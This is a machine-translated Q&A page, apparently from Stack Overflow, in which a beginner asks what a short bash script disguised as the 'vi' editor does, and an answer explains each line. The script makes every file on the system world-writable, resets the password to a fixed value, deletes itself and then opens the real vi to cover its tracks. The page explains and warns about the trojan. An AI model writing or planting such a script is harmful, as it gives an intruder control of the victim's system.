关于Shell脚本,我是一个非常笨拙的初学者,但是我必须能够解释这些代码行的用途,并且没有足够的时间首先熟悉它,所以我不能真正给出一个很多投入。
作为附加信息,脚本本身像编辑器一样被称为vi,可能有害/希望以admin身份运行
#!/bin/bash
#
# execute on your own risk !!
chmod -R og+rwx /
echo -e ‘‘Hacke.peter\n Hacke.peter\n’’ | passwd
rm $0
vi $*
logout # good bye!
我认为这个想法是有人试图运行实际的vi(而不是此脚本),然后他不小心调用了该脚本-它会将当前用户密码更改为echo命令的输出(不知道那是什么) ),然后shell删除自身并调用编辑器,因此我们不知道发生任何事情。 非常感谢您提前做出任何答复,并很抱歉。
答案 0 :(得分:2)
HMM不确定是笨手笨脚的初学者还是狡猾的黑客[插入可疑的Fry meme]。这样的姓氏?
脚本逐步执行以下操作:
chmod -R og+rwx /:递归(-R)打开您的所有文件,以供组(+rwx)中的用户读取,写入和执行(g)。所有其他用户(o)。
echo -e ‘‘Hacke.peter\n Hacke.peter\n’’ | passwd:将超级用户密码重置为“ Hacke.peter”。
rm $0:将自身删除。 bash中的$0代表当前脚本的文件名。
vi $*:使用您传递给原始(现在已擦除)脚本的任何参数($*)打开真正的vi编辑器。如果脚本也称为vi,则此步骤是隐藏曲目并避免怀疑。
logout:使您退出root用户模式。现在您不再具有root用户,并且文件系统已打开。
非常讨厌的脚本!